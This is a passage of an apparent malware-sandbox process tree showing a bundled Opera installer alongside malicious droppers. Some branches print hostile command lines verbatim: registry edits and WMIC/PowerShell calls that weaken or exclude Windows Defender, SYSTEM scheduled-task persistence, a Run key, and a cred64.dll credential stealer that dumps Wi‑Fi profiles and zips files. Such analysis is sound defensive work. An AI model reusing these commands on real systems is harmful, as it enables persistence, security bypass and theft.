                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\0RVOkCttMp6duWJry0Gs9Wia.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\0RVOkCttMp6duWJry0Gs9Wia.exe" --version
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:4216
                                                                                                • C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe
                                                                                                  "C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5980 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240428232326" --session-guid=97a9a44d-ab81-4cc1-b23c-777b10b78f3e --server-tracking-blob="ZmU5NGY4ZGNlNzAyYmIwZGI5MWYxMjFiZTg0MmFlNmFmNGZlYzQxMDM1NzczNWU3MjNjOTBlZDkwY2Q2NmFhNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MzQ2NTk3LjM3NTAiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYWRiM2ZkZTctODllNS00YmI3LWI3MjktMjZkM2E3MGEyNDgzIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7004000000000000
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Enumerates connected drives
                                                                                                  PID:5412
                                                                                                  • C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe
                                                                                                    C:\Users\Admin\Pictures\0RVOkCttMp6duWJry0Gs9Wia.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x69b1e1d0,0x69b1e1dc,0x69b1e1e8
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    PID:5144
                                                                                                  • C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\installer.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\installer.exe" --backend --initial-pid=5980 --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --server-tracking-data=server_tracking_data --show-intro-overlay --package-dir="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261" --session-guid=97a9a44d-ab81-4cc1-b23c-777b10b78f3e --server-tracking-blob="ZmU5NGY4ZGNlNzAyYmIwZGI5MWYxMjFiZTg0MmFlNmFmNGZlYzQxMDM1NzczNWU3MjNjOTBlZDkwY2Q2NmFhNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MzQ2NTk3LjM3NTAiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYWRiM2ZkZTctODllNS00YmI3LWI3MjktMjZkM2E3MGEyNDgzIn0= " --silent --desktopshortcut=1 --install-subfolder=109.0.5097.68
                                                                                                    6⤵
                                                                                                      PID:5884
                                                                                                      • C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\installer.exe
                                                                                                        C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x27c,0x280,0x284,0x258,0x288,0x7ff997cf7c80,0x7ff997cf7c8c,0x7ff997cf7c98
                                                                                                        7⤵
                                                                                                          PID:3880
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --copyonly=0 --allusers=0
                                                                                                          7⤵
                                                                                                            PID:1528
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xe36038,0xe36044,0xe36050
                                                                                                              8⤵
                                                                                                                PID:4388
                                                                                                            • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --ran-launcher --install-extension="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\be76331b95dfc399cd776d2fc68021e0db03cc4f.crx"
                                                                                                              7⤵
                                                                                                                PID:4756
                                                                                                                • C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2ac,0x2b0,0x2b4,0x2a8,0x2b8,0x7ff994ade650,0x7ff994ade660,0x7ff994ade670
                                                                                                                  8⤵
                                                                                                                    PID:1260
                                                                                                                  • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1872,i,15293325846171049483,3193638017370649213,262144 --variations-seed-version --mojo-platform-channel-handle=1860 /prefetch:2
                                                                                                                    8⤵
                                                                                                                      PID:5584
                                                                                                                    • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2076,i,15293325846171049483,3193638017370649213,262144 --variations-seed-version --mojo-platform-channel-handle=2104 /prefetch:3
                                                                                                                      8⤵
                                                                                                                        PID:6036
                                                                                                                      • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --field-trial-handle=2316,i,15293325846171049483,3193638017370649213,262144 --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:8
                                                                                                                        8⤵
                                                                                                                          PID:492
                                                                                                                      • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --show-intro-overlay --start-maximized
                                                                                                                        7⤵
                                                                                                                          PID:6612
                                                                                                                          • C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.68\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2c0,0x2c4,0x2c8,0x2bc,0x2cc,0x7ff994ade650,0x7ff994ade660,0x7ff994ade670
                                                                                                                            8⤵
                                                                                                                              PID:6648
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
                                                                                                                        5⤵
                                                                                                                          PID:5180
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe" --version
                                                                                                                          5⤵
                                                                                                                            PID:6028
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0xe36038,0xe36044,0xe36050
                                                                                                                              6⤵
                                                                                                                                PID:4496
                                                                                                                          • C:\Users\Admin\Pictures\9s3HoD6vGqGQPo6BT2pzsOGw.exe
                                                                                                                            "C:\Users\Admin\Pictures\9s3HoD6vGqGQPo6BT2pzsOGw.exe"
                                                                                                                            4⤵
                                                                                                                            • Modifies firewall policy service
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            PID:2880
                                                                                                                          • C:\Users\Admin\Pictures\D910tg0qjEG8J6uqCMB9zKF2.exe
                                                                                                                            "C:\Users\Admin\Pictures\D910tg0qjEG8J6uqCMB9zKF2.exe"
                                                                                                                            4⤵
                                                                                                                              PID:5720
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8090.tmp\Install.exe
                                                                                                                                .\Install.exe /WkfdidVYT "385118" /S
                                                                                                                                5⤵
                                                                                                                                  PID:4920
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                    6⤵
                                                                                                                                      PID:1564
                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                        7⤵
                                                                                                                                          PID:2508
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                            8⤵
                                                                                                                                              PID:2636
                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                9⤵
                                                                                                                                                  PID:5776
                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                              7⤵
                                                                                                                                                PID:4468
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                  8⤵
                                                                                                                                                    PID:1528
                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                      9⤵
                                                                                                                                                        PID:3384
                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:5508
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                        8⤵
                                                                                                                                                          PID:3360
                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                            9⤵
                                                                                                                                                              PID:6000
                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:2648
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                              8⤵
                                                                                                                                                                PID:5140
                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:2532
                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:1608
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:3920
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:5520
                                                                                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                            10⤵
                                                                                                                                                                              PID:5204
                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:5268
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:1748
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:3712
                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:6136
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 23:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8090.tmp\Install.exe\" Wt /iyIdidkKWA 385118 /S" /V1 /F
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                              PID:7144
                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:1344
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C schtasks /run /I /tn biPxHmULFllsbMgnpt
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:6424
                                                                                                                                                                                    • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /run /I /tn biPxHmULFllsbMgnpt
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:6428
                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:1852
                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:5140
                                                                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                                                                netsh wlan show profiles
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:5176
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\938118698296_Desktop.zip' -CompressionLevel Optimal
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:5720
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                              PID:5244
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                PID:4072
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                PID:5336
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5720
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
